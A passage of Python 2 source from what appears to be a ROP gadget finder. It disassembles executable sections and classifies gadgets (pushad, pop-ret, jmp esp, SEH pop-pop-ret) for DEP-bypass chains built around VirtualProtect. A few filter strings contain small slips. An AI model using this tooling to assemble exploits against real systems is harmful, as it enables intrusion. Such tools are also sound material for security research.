 53 | 			for targetGadget in GadgetFormat:
 54 | 				retPostions = [ pos.start() for pos in re.finditer(targetGadget[PATTERN], code) ]
 55 | 				for position in retPostions:
 56 | 					start = section["vaddr"] + position
 57 | 					pattern = self.__disassembler.disasm( code[ position:position+targetGadget[PATTERN_SIZE] ], 0 )
 58 | 					gadget = ""
 59 | 
 60 | 					for instruction in pattern:
 61 | 						gadget += (instruction.mnemonic + " " + instruction.op_str + " ; ").replace("  ", " ")
 62 | 
 63 | 					if len(gadget)>0 and gadget.startswith(targetGadget[OPCODE]) and gadget_filter(start):
 64 | 						gadget = gadget[:-3]
 65 | 						
 66 | 						Gadgets += [
 67 | 							{
 68 | 								"vaddr" : start,
 69 | 								"gadgets" : gadget,
 70 | 								"bytes" : code[ position : position + targetGadget[PATTERN_SIZE]]
 71 | 							}
 72 | 						]
 73 | 
 74 | 		return Gadgets
 75 | 
 76 | 	def collect_gadgets(self, GadgetFormat):
 77 | 		Gadgets = []
 78 | 		for section in self.__execSections:
 79 | 			code = section["code"]
 80 | 			for targetGadget in GadgetFormat:
 81 | 				retPostions = [ pos.start() for pos in re.finditer(targetGadget[PATTERN], code) ]
 82 | 				for position in retPostions:
 83 | 					for deep in xrange(MAX_DEPTH+1):
 84 | 						start = section["vaddr"] + position - deep * targetGadget[CODE_SIZE]
 85 | 
 86 | 						if (start % targetGadget[CODE_SIZE] == 0) and gadget_filter(start):
 87 | 							pattern = self.__disassembler.disasm( code[ position - deep * targetGadget[CODE_SIZE] : position + targetGadget[PATTERN_SIZE] ], 0 )
 88 | 							gadget = ""
 89 | 							
 90 | 							for instruction in pattern:
 91 | 								gadget += (instruction.mnemonic + " " + instruction.op_str + " ; ").replace("  ", " ")
 92 | 
 93 | 							if len(gadget)>0 and gadget.split(" ; ")[-2].find(targetGadget[OPCODE])!=-1 and gadget.find("leave")==-1 and gadget.count("ret")==1 and gadget.find("ret 0x")==-1 and gadget.find("ret -")==-1 and gadget.find("retf 0x")==-1 and gadget.find("retf -")==-1 and gadget.find("ret 1") == -1 and gadget.find("retf 1") == -1 and gadget.find("ret 2") == -1 and gadget.find("retf 2") == -1 and gadget.find("ret 3") == -1 and gadget.find("retf 3") == -1 and gadget.find("ret 4") == -1 and gadget.find("retf 4") == -1:
 94 | 								gadget = gadget[:-3]
 95 | 						
 96 | 								Gadgets += [
 97 | 									{
 98 | 										"vaddr" : start,
 99 | 										"gadgets" : gadget,
100 | 										"bytes" : code[ position - deep * targetGadget[CODE_SIZE] : position + targetGadget[PATTERN_SIZE] ]
101 | 									}
102 | 								]
103 | 		return Gadgets
104 | 	
105 | 	@property
106 | 	def jmpGadgets(self):
107 | 		return self.__jmpGadgets
108 | 
109 | 	@property
110 | 	def retGadgets(self):
111 | 		return self.__retGadgets
112 | 	
113 | 	@property
114 | 	def sysGadgets(self):
115 | 		return self.__sysGadgets
116 | 		
117 | NUM_FORMAT = "(0x[\da-f]+)|(\d+)"
118 | 
119 | # Check gadget's instruction.
120 | def check_gadget_pass(gadgets, allow, not_allow):
121 | 	patterns = gadgets.split(" ; ")
122 | 	statu = True
123 | 	counter = 0
124 | 
125 | 	while counter<len(gadgets) and statu:
126 | 		check_ok = False
127 | 		for pattern in patterns:
128 | 			for allow_pattern in allow:
129 | 				if pattern.find(allow_pattern)!=-1:
130 | 					check_ok = True
131 | 					break
132 | 
133 | 			if check_ok:
134 | 				for not_allow_pattern in not_allow:
135 | 					if pattern.startswith(not_allow_pattern):
136 | 						statu = False
137 | 						break
138 | 			else:
139 | 				statu = False
140 | 		counter += 1
141 | 	return statu
142 | 
143 | # Merge gadget by type
144 | def merge_gadgets(gadget_type, new_gadgets, collection):
145 | 	if collection.has_key(gadget_type):
146 | 		collection[gadget_type].update(new_gadgets)
147 | 	else:
148 | 		collection[gadget_type] = new_gadgets
149 | 
150 | # Classify all gadget type.
151 | '''
152 | 	+------+--------+-----+-----+-----+-----+-----+-------+-----+--------+--------+-----+-----+--------+--------+
153 | 	| type | pushad | xor | inc | dec | pop | neg | clear | add | addnum | jmpesp | nop | SEH | pickup | movreg |
154 | 	+------+--------+-----+-----+-----+-----+-----+-------+-----+--------+--------+-----+-----+--------+--------+
155 | '''
156 | 
157 | def classify_gadget(all_gadgets, jmp_gadgets, collection):
158 | 	REGISTER = [ "eax", "ebx", "ecx", "edx", "esi", "edi", "ebp"]
159 | 
160 | 	'''
161 | 		Add pushad gadget.
162 | 		+----------------+
163 | 		| pushad(puahal) |
164 | 		+----------------+
165 | 	'''
166 | 	# Instructions filter for pushad gadget.
167 | 	PUSHAD_ALLOW_INS = [ "pushad", "pushal", "inc ", "dec ", "add ", "sub ", "or ", "and ", "xor ", "adc ", "ret", "nop", "pop ", "lea ", "push eax", "push edi", "fpatan", "mov e", "test ", "cmp " ]
168 | 	PUSHAD_NOT_ALLOW_INS = [ "popad", "popal", "push esp", "pop esp", "inc esp", "dec esp", "add esp", "sub esp", "xor esp", "lea esp", "ss: ", "ds: " ]
169 | 
170 | 	for register1 in REGISTER:
171 | 		# Change data in stack head or bottom.
172 | 		PUSHAD_ALLOW_INS.append("mov %s, dword ptr ds:[esp" % register1)
173 | 		PUSHAD_ALLOW_INS.append("mov %s, dword ptr ss:[esp" % register1)
174 | 		PUSHAD_ALLOW_INS.append("mov %s, dword ptr [esp" % register1)
175 | 		PUSHAD_ALLOW_INS.append("mov %s, dword ptr ds:[ebp" % register1)
176 | 		PUSHAD_ALLOW_INS.append("mov %s, dword ptr ss:[ebp" % register1)
177 | 		PUSHAD_ALLOW_INS.append("mov %s, dword ptr [ebp" % register1)
178 | 		# Put virtualprotect ptr to esi
179 | 		PUSHAD_ALLOW_INS.append("mov %s, dword ptr ds:[esi" % register1)
180 | 		PUSHAD_ALLOW_INS.append("mov %s, dword ptr ss:[esi" % register1)
181 | 		PUSHAD_ALLOW_INS.append("mov %s, dword ptr [esi" % register1)
182 | 		
183 | 		for register2 in REGISTER:
184 | 			PUSHAD_ALLOW_INS.append("mov %s, %s" % (register1, register2))
185 | 			PUSHAD_ALLOW_INS.append("lea %s, %s" % (register1, register2))
186 | 			PUSHAD_ALLOW_INS.append("xchg %s, %s" % (register1, register2))
187 | 
188 | 	for g in all_gadgets:
189 | 		instructions = g["gadgets"]
190 | 		if instructions.startswith("pushad") or instructions.startswith("pushal"):
191 | 			if instructions.count("pop ")<2 and check_gadget_pass(instructions, PUSHAD_ALLOW_INS, PUSHAD_NOT_ALLOW_INS):
192 | 				new_gadget = { g["vaddr"] : g["gadgets"] }
193 | 				merge_gadgets("pushad", new_gadget, collection)
194 | 
195 | 	'''
196 | 		Add xor gadgets.
197 | 		+-----+
198 | 		| xor |
199 | 		+-----+
200 | 	'''
201 | 	XOR_ALLOW_INS = ["nop", "ret", "pop ", "inc ", "dec ", "and ", "or ", "xor ", "push ", "xchg ", "adc ", "fpatan", "test ", "cmp "]
202 | 	
203 | 	for register1 in REGISTER:
204 | 		for register2 in REGISTER:
205 | 			if register1!=register2:
206 | 				XOR_NOT_ALLOW_INS = [ "pop " + register2, "mov " + register2, "xor " + register2, "and register2",
207 | 					"jmp ", "pushad", "pushal", "popad", "popal", "dec esp", "ds:", "ss:", "inc esp" ]
208 | 				for g in all_gadgets:
209 | 					instructions = g["gadgets"]
210 | 					if instructions.startswith("xor") and check_gadget_pass(instructions, XOR_ALLOW_INS, XOR_NOT_ALLOW_INS):
211 | 						new_gadget = {g["vaddr"] : g["gadgets"]}
212 | 						merge_gadgets("xor", new_gadget, collection)
213 | 
214 | 	'''
215 | 		Add inc gadgets.
216 | 		+-----+
217 | 		| inc |
218 | 		+-----+
219 | 	'''
220 | 	for register1 in REGISTER:
221 | 		INC_ALLOW_INS = ["nop", "ret", "pop ", "inc " + register1, "dec ", "and ", "or ", "xor ", "push ", "xchg ", "adc ", "fpatan", "test ", "cmp "]
222 | 		INC_NOT_ALLOW_INS = [ "pop " + register1, "mov " + register1 + ",", "xchg " + register1 + ",", "xor " + register1, "lea " + register1 + ",", "dec " + register1,
223 | 			"ds:", "ss:", "dec esp", "inc esp" ]
224 | 		for g in all_gadgets:
225 | 			instructions = g["gadgets"]
226 | 			if instructions.startswith("inc") and check_gadget_pass(instructions, INC_ALLOW_INS, INC_NOT_ALLOW_INS):
227 | 				new_gadget = { g["vaddr"] : g["gadgets"] }
228 | 				merge_gadgets("inc", new_gadget, collection)
229 | 
230 | 	'''
231 | 		Add dec gadgets
232 | 		+-----+
233 | 		| dec |
234 | 		+-----+
235 | 	'''
236 | 	for register1 in REGISTER:
237 | 		DEC_ALLOW_INS = ["nop", "ret", "pop ", "dec " + register1, "dec ", "and ", "or ", "xor ", "push ", "xchg ", "adc ", "fpatan", "test ", "cmp "]
238 | 		DEC_NOT_ALLOW_INS = [ "pop " + register1, "mov " + register1 + ",", "xchg " + register1 + ",", "xor " + register1, "lea " + register1 + ",", "inc " + register1,
239 | 			"ds:", "ss:", "dec esp", "inc esp" ]
240 | 		for g in all_gadgets:
241 | 			instructions = g["gadgets"]
242 | 			if instructions.startswith("dec") and check_gadget_pass(instructions, DEC_ALLOW_INS, DEC_NOT_ALLOW_INS):
243 | 				new_gadget = { g["vaddr"] : g["gadgets"] }
244 | 				merge_gadgets("dec", new_gadget, collection)
245 | 
246 | 	'''
247 | 		Add pop gadgets
248 | 		+-----+
249 | 		| pop |
250 | 		+-----+
251 | 	'''
252 | 	for register1 in REGISTER:
253 | 		POP_ALLOW_INS = "pop %s ; ret" % register1
254 | 		for g in all_gadgets:
255 | 			instructions = g["gadgets"]
256 | 			if instructions.startswith(POP_ALLOW_INS):
257 | 				new_gadget = { g["vaddr"] : g["gadgets"] }
258 | 				merge_gadgets("pop", new_gadget, collection)
259 | 
260 | 	'''
261 | 		Add neg gadgets.
262 | 		+-----+
263 | 		| neg |
264 | 		+-----+
265 | 	'''
266 | 	for register1 in REGISTER:
267 | 		NEG_ALLOW_INS = "neg %s ; ret" % register1
268 | 		for g in all_gadgets:
269 | 			instructions = g["gadgets"]
270 | 			if instructions.startswith(NEG_ALLOW_INS):
271 | 				new_gadget = { g["vaddr"] : g["gadgets"] }
272 | 				merge_gadgets("neg", new_gadget, collection)
273 | 
274 | 	'''
275 | 		Add clear register.
276 | 	'''
277 | 	for register1 in REGISTER:
278 | 		CLEAR_ALLOW_INS = [ "xor " + register1 + ", " + register1 + " ; ret", "mov " + register1 + ", 0xffffffff ; inc " + register1 + " ; ret",
279 | 						"sub " + register1 + ", " + register1 + " ; ret", "push 0 ; pop " + register1 + " ; ret", "imul " + register1 + ", " + register1 + ", 0 ; ret" ]
280 | 		for g in all_gadgets:
281 | 			instructions = g["gadgets"]
282 | 			for pattern in CLEAR_ALLOW_INS:
283 | 				if instructions.startswith(pattern):
284 | 					new_gadget = { g["vaddr"] : g["gadgets"] }
285 | 					merge_gadgets("clear", new_gadget, collection)
286 | 
287 | 	'''
288 | 		Add add register1, register2 gadget.
289 | 		+----------------+
290 | 		| add reg1, reg2 |
291 | 		+----------------+
292 | 	'''
293 | 	for register1 in REGISTER:
294 | 		for register2 in REGISTER:
295 | 			if register1!=register2:
296 | 				ADD_ALLOW_INS = [ "nop", "ret", "pop ", "inc ", "dec ", "and", "or ", "xor ","add ", "adc ", "sub ", "fpatan", "test ", "cmp ", "mov eax" ]
297 | 				ADD_NOT_ALLOW_INS = [ "pop " + register1, "mov " + register1 + ",", "xchg " + register1 + ",", "xor " + register1, "lea " + register1 + ",",
298 | 								"ds: ", "ss: ", "dec esp", "inc esp", "mov eax, dword ptr [eax" ]
299 | 				head = [ "add " + register1 + ", " + register2, "adc " + register1 + ", " + register2  ]
300 | 				for g in all_gadgets:
301 | 					instructions = g["gadgets"]
302 | 					for pattern in head:
303 | 						if instructions.startswith(pattern) and check_gadget_pass(instructions, ADD_ALLOW_INS, ADD_NOT_ALLOW_INS):
304 | 							new_gadget = { g["vaddr"] : g["gadgets"] }
305 | 							merge_gadgets("add", new_gadget, collection)
306 | 
307 | 	'''
308 | 		Add add num gadget.
309 | 		+--------------+
310 | 		| add reg, num |
311 | 		+--------------+
312 | 	'''
313 | 	for register1 in REGISTER + ["esp"]:
314 | 		ADDNUM_ALLOW_INS = [ "nop" , "ret" , "pop ", "inc ", "dec ", "and", "or ", "push ", "adc ", "sub ", "fpatan", "test ", "cmp " ]
315 | 		ADDNUM_NOT_ALLOW_INS = ["pop " + register1, "mov " + register1 + ",", "xchg " + register1 + ",", "xor " + register1, "lea " + register1 + ",",
316 | 							"ds:", "ss:", "dec esp", "leave" ]
317 | 		head = [ "add " + register1 + ",", "adc " + register1 + ",", "sub " + register1 + ","]
318 | 		for g in all_gadgets:
319 | 			instructions = g["gadgets"]
320 | 			if instructions.startswith(head[0]) or instructions.startswith(head[1]) or instructions.startswith(head[2]):
321 | 				if re.search(NUM_FORMAT, instructions.split(",")[1].split(" ; ")[0]) is None:
322 | 					break
323 | 				else:
324 | 					instructions = (" ; ").join(instructions.split(" ; ")[1:])
325 | 				if check_gadget_pass(instructions, ADDNUM_ALLOW_INS, ADDNUM_NOT_ALLOW_INS):
326 | 					new_gadget = { g["vaddr"] : g["gadgets"] }
327 | 					merge_gadgets("addnum", new_gadget, collection)
328 | 
329 | 	'''
330 | 		Add jmp esp gadget.
331 | 		+---------------+
332 | 		| jmp(call) reg |
333 | 		+---------------+
334 | 	'''
335 | 	for register1 in REGISTER + ["esp"]:
336 | 		JMP_ALLOW_INS = [ "jmp " + register1, "call " + register1, "push esp ; ret" ]
337 | 		for g in all_gadgets:
338 | 			instructions = g["gadgets"]
339 | 			for pattern in JMP_ALLOW_INS:
340 | 				if instructions.startswith(pattern):
341 | 					new_gadget = { g["vaddr"] : g["gadgets"] }
342 | 					merge_gadgets("jmpesp", new_gadget, collection)
343 | 
344 | 	for g in jmp_gadgets:
345 | 		new_gadget = { g["vaddr"] : g["gadgets"] }
346 | 		merge_gadgets("jmpesp", new_gadget, collection)
347 | 
348 | 	'''
349 | 		Add nop gadget.
350 | 		+-----+
351 | 		| nop |
352 | 		+-----+
353 | 	'''
354 | 	NOP_ALLOW_INS = [ "nop", "ret", "retf", "retn"]
355 | 	for g in all_gadgets:
356 | 		instruction = g["gadgets"].split(" ; ")
357 | 		check_ok = True
358 | 		for pattern in instruction:
359 | 			if pattern not in NOP_ALLOW_INS:
360 | 				check_ok = False
361 | 				break
362 | 		if check_ok:
363 | 			new_gadget = { g["vaddr"] : g["gadgets"] }
364 | 			merge_gadgets("nop", new_gadget, collection)
365 | 
366 | 	'''
367 | 		Add SEH pop pop ret gadget.
368 | 		+-----+
369 | 		| SEH |
370 | 		+-----+
371 | 	'''
372 | 
373 | 	SEH_ALLOW_INS = ["add esp, 8 ; ret", "add esp,4 ; add esp, 4 ; ret"]
374 | 	for register1 in REGISTER:
375 | 		SEH_ALLOW_INS.append("add esp,4 ; pop " + register1 + " ; ret")
376 | 		SEH_ALLOW_INS.append("pop " + register1 + "add esp,4 ; ret")
377 | 		for register2 in REGISTER:
378 | 			SEH_ALLOW_INS.append("pop " + register1 + " ; pop " + register2 + " ; ret")
379 | 
380 | 	for g in all_gadgets:
381 | 		instruction = g["gadgets"]
382 | 		for pattern in SEH_ALLOW_INS:
383 | 			if instruction.startswith(pattern):
384 | 				new_gadget = { g["vaddr"] : g["gadgets"]}
385 | 				merge_gadgets("seh", new_gadget, collection)
386 | 
387 | 	'''
388 | 		Add pickup gadget.
389 | 		+----------------------------+
390 | 		| mov reg1, dword ptr [reg2] |
391 | 		+----------------------------+
392 | 	'''
393 | 
394 | 	PICKUP_ALLOW_INS = [ "nop", "ret", "inc ", "dec ", "and ", "or ", "xor ", "mov ", "lea ", "add ", "sub ", "adc ",
395 | 				"pop ", "fpatan", "test ", "cmp " ]
396 | 	PICKUP_NOT_ALLOW_INS = [ "mov esp", "xor esp", "lea esp", "mov dword ptr", "dec esp", "inc esp", "call 0x", "jmp", "jne", "leave" ]
397 | 	for register1 in REGISTER:
398 | 		for register2 in REGISTER:
399 | 			PICKUP_REGISTER1 = PICKUP_ALLOW_INS + [ "mov " + register1 + ", dword ptr [" + register2 + "]" ]
400 | 			PICKUP_REGISTER1.append("mov " + register1 + ", dword ptr ss: [" + register2 + "]")
401 | 			PICKUP_REGISTER1.append("mov " + register1 + ", dword ptr ds: [" + register2 + "]")
402 | 			header = []
403 | 			header.append("mov " + register1 + ", dword ptr [" + register2 + "]")
404 | 			header.append("mov " + register1 + ", dword ptr ss: [" + register2 + "]")
405 | 			header.append("mov " + register1 + ", dword ptr ds: [" + register2 + "]")
406 | 			PICKUP_NOT_REGISTER1 = PICKUP_NOT_ALLOW_INS + [ "pop " + register1, "lea " + register1 + ", e"]
407 | 			pickupType = "pickup" + register1 + register2
408 | 			for g in all_gadgets:
409 | 				instructions = g["gadgets"]
410 | 				for head in header:
411 | 					if instructions.startswith(head) and instructions.count("dword ptr")==1:
412 | 						# print "check %s." % instructions
413 | 						if check_gadget_pass(instructions, PICKUP_REGISTER1, PICKUP_NOT_REGISTER1):
414 | 							new_gadget = { g["vaddr"] : g["gadgets"] }
415 | 							merge_gadgets(pickupType, new_gadget, collection)
416 | 
417 | 	'''
418 | 		Add movreg gadget.
419 | 		+----------------+
420 | 		| mov reg1, reg2 |
421 | 		+----------------+
422 | 	'''
423 | 	MOVREG_ALLOW_INS = ["nop", "ret", "pop ", "inc ", "dec ", "add ", "sub ", "and ", "or ", "xor ", "xchg", "fpatan", "cmp ", "test " ]
424 | 	MOVREG_NOT_ALLOW_INS = [ "ds:", "ss:", "pushad", "pushal", "popad", "popal", "dec esp", "inc esp", "call 0x", "jmp", "leave", "jne"]
425 | 			# "ret 0x", "ret -", "ret 1", "ret 4", "ret 8", "retf -0x", "retf 0x", "retf 1" "retf 4", "retf 8" ]
426 | 	for register1 in REGISTER:
427 | 		for register2 in REGISTER:
428 | 			MOV_TYPE = "mov"+register1+register2
429 | 			MOVREG_ALLOW = MOVREG_ALLOW_INS + [ "mov " + register1 + ", " + register2 ]
430 | 			MOVREG_ALLOW.append("lea " + register1 + ", " + register2)
431 | 			MOVREG_ALLOW.append("xchg " + register1 + ", " + register2)
432 | 			MOVREG_ALLOW.append("xchg " + register2 + ", " + register1)
433 | 			MOVREG_NOT_ALLOW = MOVREG_NOT_ALLOW_INS + [ "pop " + register2 ]
434 | 			MOVREG_NOT_ALLOW += [ "lea " + register2, "mov " + register2, "xor " + register2, "and " + register2]
435 | 			header = []
436 | 			header.append("lea " + register1 + ", " + register2)
437 | 			header.append("xchg " + register1 + ", " + register2)
438 | 			header.append("xchg " + register2 + ", " + register1)
439 | 			for g in all_gadgets:
440 | 				instructions = g["gadgets"]
441 | 				for head in header:
442 | 					if instructions.startswith(head) and check_gadget_pass(instructions, MOVREG_ALLOW, MOVREG_NOT_ALLOW):
443 | 						new_gadget = { g["vaddr"] : g["gadgets"] }
444 | 						merge_gadgets(MOV_TYPE, new_gadget, collection)


--------------------------------------------------------------------------------